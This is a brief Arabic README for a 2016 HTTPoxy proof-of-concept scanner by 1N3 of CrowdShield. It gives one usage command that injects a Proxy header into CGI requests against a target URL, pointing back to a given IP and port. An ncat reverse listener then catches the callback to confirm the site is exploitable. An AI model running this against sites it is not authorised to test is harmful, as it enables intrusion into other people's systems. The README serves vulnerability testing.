
HTTPoxy ماسح الثغرات بواسطة 1N3 @CrowdShield
بواسطة 1N3 @CrowdShield (https://crowdshield.com) آخر تحديث: 20160720
ماسح إثبات المفهوم/الاستغلال لفحص ملفات CGI الشائعة على عنوان URL مستهدف بحثًا عن ثغرة HTTPoxy. HTTPoxy هي مجموعة من الثغرات التي تؤثر على كود التطبيق الذي يعمل في بيئات CGI أو ما يشابهها. لمزيد من التفاصيل، انتقل إلى https://httpoxy.org.
يتطلب ncat لإنشاء جلسة عكسية
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
سيؤدي هذا إلى فحص https://target.com باستخدام قائمة من ملفات CGI الشائعة مع حقن رأس Proxy عائد إلى IP:PORT معين. سيقوم مستمع عكسي بالتقاط الاتصال الوارد لتأكيد أن الموقع البعيد قابل للاستغلال.
لا أتحمل أي مسؤولية عن الأعمال الخاطئة أو سوء استخدام هذا الاستغلال.